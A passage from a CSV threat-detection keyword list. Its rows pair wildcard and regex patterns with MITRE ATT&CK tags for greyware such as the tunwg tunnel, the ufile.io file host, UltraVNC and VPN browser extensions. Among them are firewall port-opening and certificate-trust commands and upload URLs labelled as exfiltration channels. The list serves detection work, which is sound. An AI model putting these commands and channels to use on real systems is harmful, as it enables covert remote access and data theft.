TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*b46ed003967f739acb4f0778b4665dc9aceab652c51223b10f632ab0681b7261*",".{0,1000}b46ed003967f739acb4f0778b4665dc9aceab652c51223b10f632ab0681b7261.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*certs@tunwg.com*",".{0,1000}certs\@tunwg\.com.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#email","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*d0d4347afb60b25e067af0d693c644b76560164c793304e35af765d023c14df6*",".{0,1000}d0d4347afb60b25e067af0d693c644b76560164c793304e35af765d023c14df6.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - 
T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*ddc7e4a39c307d93871a3198d2e888e697a0106b5ebc7002e9361d0f49ba2b21*",".{0,1000}ddc7e4a39c307d93871a3198d2e888e697a0106b5ebc7002e9361d0f49ba2b21.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*e105000f9beb2d9659ead318f0f8a9a3acf90606024c5eef2fe11a4d140c4ee2*",".{0,1000}e105000f9beb2d9659ead318f0f8a9a3acf90606024c5eef2fe11a4d140c4ee2.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*e750475e2594a84524d937f7ee405611f4237851d4a8d119f4d41b6127d2aa82*",".{0,1000}e750475e2594a84524d937f7ee405611f4237851d4a8d119f4d41b6127d2aa82.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*ea46f4c9b2aacf0628d9410efe46c2a625eaf7a1b9a1a017e5547a5361062985*",".{0,1000}ea46f4c9b2aacf0628d9410efe46c2a625eaf7a1b9a1a017e5547a5361062985.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","#filehash","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*https://tunwg.com*",".{0,1000}https\:\/\/tunwg\.com.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure 
tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*ntnj/tunwg*",".{0,1000}ntnj\/tunwg.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*tunwg --forward*",".{0,1000}tunwg\s\-\-forward.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*tunwg -p *",".{0,1000}tunwg\s\-p\s.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*tunwg*wireguard.go*",".{0,1000}tunwg.{0,1000}wireguard\.go.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*tunwg: initiating handshake to server*",".{0,1000}tunwg\:\sinitiating\shandshake\sto\sserver.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*TUNWG_IP=*",".{0,1000}TUNWG_IP\=.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - 
T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*TUNWG_RELAY*",".{0,1000}TUNWG_RELAY.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*TUNWG_RUN_SERVER*",".{0,1000}TUNWG_RUN_SERVER.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z" "*jliodmnojccaloajphkingdnpljdhdok*",".{0,1000}jliodmnojccaloajphkingdnpljdhdok.{0,1000}","greyware_tool_keyword","Turbo VPN for PC","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://store-*.ufile.io/v1/upload/*",".{0,1000}https\:\/\/store\-.{0,1000}\.ufile\.io\/v1\/upload\/.{0,1000}","greyware_tool_keyword","ufile.io","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Hive","Data Exfiltration","https://ufile.io","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A" "*https://ufile.io/*",".{0,1000}https\:\/\/ufile\.io\/.{0,1000}","greyware_tool_keyword","ufile.io","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - 
TA0009","N/A","Hive","Collection","https://ufile.io","1","1","N/A","downloading files url","5","6","N/A","N/A","N/A","N/A" "*https://ufile.io/v1/upload/*",".{0,1000}https\:\/\/ufile\.io\/v1\/upload\/.{0,1000}","greyware_tool_keyword","ufile.io","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Hive","Data Exfiltration","https://ufile.io","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A" "*mjnbclmflcpookeapghfhapeffmpodij*",".{0,1000}mjnbclmflcpookeapghfhapeffmpodij.{0,1000}","greyware_tool_keyword","Ultrareach VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* start uvnc_service*",".{0,1000}\sstart\suvnc_service.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* stop uvnc_service*",".{0,1000}\sstop\suvnc_service.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* ultravnc.ini *",".{0,1000}\sultravnc\.ini\s.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* 
vnc.ini *",".{0,1000}\svnc\.ini\s.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*""publisher"":""uvnc bvba*",".{0,1000}\""publisher\""\:\""uvnc\sbvba.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry value","10","10","N/A","N/A","N/A","N/A" "*/downloads/ultravnc.html*",".{0,1000}\/downloads\/ultravnc\.html.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\127.0.0.1-5900.vnc*",".{0,1000}\\127\.0\.0\.1\-5900\.vnc.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\*-5900.vnc*",".{0,1000}\\AppData\\Roaming\\.{0,1000}\-5900\.vnc.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\UltraVNC\*",".{0,1000}\\AppData\\Roaming\\UltraVNC\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\createpassword.exe*",".{0,1000}\\createpassword\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\Uninstall\Ultravnc2_is1\*",".{0,1000}\\CurrentVersion\\Uninstall\\Ultravnc2_is1\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" "*\InventoryApplicationFile\ultravnc_*",".{0,1000}\\InventoryApplicationFile\\ultravnc_.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" "*\options.vnc*",".{0,1000}\\options\.vnc.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" "*\Services\EventLog\Application\UltraVNC\*",".{0,1000}\\Services\\EventLog\\Application\\UltraVNC\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" 
"*\SOFTWARE\ORL\VNCHooks\Application_Prefs\WinVNC*",".{0,1000}\\SOFTWARE\\ORL\\VNCHooks\\Application_Prefs\\WinVNC.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" "*\ultravnc.cer*",".{0,1000}\\ultravnc\.cer.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\UltraVNC.ini*",".{0,1000}\\UltraVNC\.ini.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\uvnc bvba\UltraVNC\*",".{0,1000}\\uvnc\sbvba\\UltraVNC\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\uvnc_launch.exe*",".{0,1000}\\uvnc_launch\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" "*\uvnc_settings.ex*",".{0,1000}\\uvnc_settings\.ex.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" "*\uvnc_settings.exe*",".{0,1000}\\uvnc_settings\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\uvnckeyboardhelper.exe*",".{0,1000}\\uvnckeyboardhelper\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\vncviewer.exe*",".{0,1000}\\vncviewer\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\winvnc.exe*",".{0,1000}\\winvnc\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\winvncsc.exe*",".{0,1000}\\winvncsc\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\winwvc.exe*",".{0,1000}\\winwvc\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*bvba_UltraVNC_*_exe*",".{0,1000}bvba_UltraVNC_.{0,1000}_exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*certutil.exe* -addstore ""TrustedPublisher""*ultravnc.cer*",".{0,1000}certutil\.exe.{0,1000}\s\-addstore\s\""TrustedPublisher\"".{0,1000}ultravnc\.cer.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*'Company'>UltraVNC</Data>*",".{0,1000}\'Company\'\>UltraVNC\<\/Data\>.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A" 
"*'Description'>VNC server</Data>*",".{0,1000}\'Description\'\>VNC\sserver\<\/Data\>.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*firewall add allowedprogram *vncviewer.exe* ENABLE ALL*",".{0,1000}firewall\sadd\sallowedprogram\s.{0,1000}vncviewer\.exe.{0,1000}\sENABLE\sALL.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*firewall add allowedprogram *winvnc.exe* ENABLE ALL*",".{0,1000}firewall\sadd\sallowedprogram\s.{0,1000}winvnc\.exe.{0,1000}\sENABLE\sALL.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*firewall add portopening TCP 5800 vnc5800*",".{0,1000}firewall\sadd\sportopening\sTCP\s5800\svnc5800.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*firewall add portopening TCP 5900 vnc5900*",".{0,1000}firewall\sadd\sportopening\sTCP\s5900\svnc5900.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*HKCR\.vnc*",".{0,1000}HKCR\\\.vnc.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" "*Program Files (x86)\uvnc bvba\*",".{0,1000}Program\sFiles\s\(x86\)\\uvnc\sbvba\\.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*UltraVNC Launcher.lnk*",".{0,1000}UltraVNC\sLauncher\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ultravnc mslogonacl*",".{0,1000}ultravnc\smslogonacl.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*UltraVNC Repeater.lnk*",".{0,1000}UltraVNC\sRepeater\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*UltraVNC Server Settings.lnk*",".{0,1000}UltraVNC\sServer\sSettings\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*UltraVNC Server.lnk*",".{0,1000}UltraVNC\sServer\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ultravnc testauth*",".{0,1000}ultravnc\stestauth.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*UltraVNC Viewer.lnk*",".{0,1000}UltraVNC\sViewer\.lnk.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*UltraVNC_*_X86_Setup*",".{0,1000}UltraVNC_.{0,1000}_X86_Setup.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ULTRAVNC_1*_X86_SETUP.EXE-*.pf*",".{0,1000}ULTRAVNC_1.{0,1000}_X86_SETUP\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ultravnc_repeater*",".{0,1000}ultravnc_repeater.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - 
T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ultravnc_server*",".{0,1000}ultravnc_server.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ultravnc_viewer*",".{0,1000}ultravnc_viewer.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*VNCviewer Config File*",".{0,1000}VNCviewer\sConfig\sFile.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry value","10","10","N/A","N/A","N/A","N/A" "*VncViewer.Config*",".{0,1000}VncViewer\.Config.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","registry path","10","10","N/A","N/A","N/A","N/A" "*VNCVIEWER.EXE-*.pf*",".{0,1000}VNCVIEWER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*WinVNC.exe*",".{0,1000}WinVNC\.exe.{0,1000}","greyware_tool_keyword","UltraVNC","UltraVNC remote access software usage","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - 
TA0009 - TA0010 - TA0011","N/A","N/A","RMM","https://uvnc.com/downloads/ultravnc.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*gbmdmipapolaohpinhblmcnpmmlgfgje*",".{0,1000}gbmdmipapolaohpinhblmcnpmmlgfgje.{0,1000}","greyware_tool_keyword","Unblock Websites","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*/uvs_v415eng.zip*",".{0,1000}\/uvs_v415eng\.zip.{0,1000}","greyware_tool_keyword","Universal Virus Sniffer","Universal Virus Sniffer detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","Phobos","Defense Evasion","https://www.majorgeeks.com/files/details/universal_virus_sniffer.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\*\Doc_ENG\_Rootkit 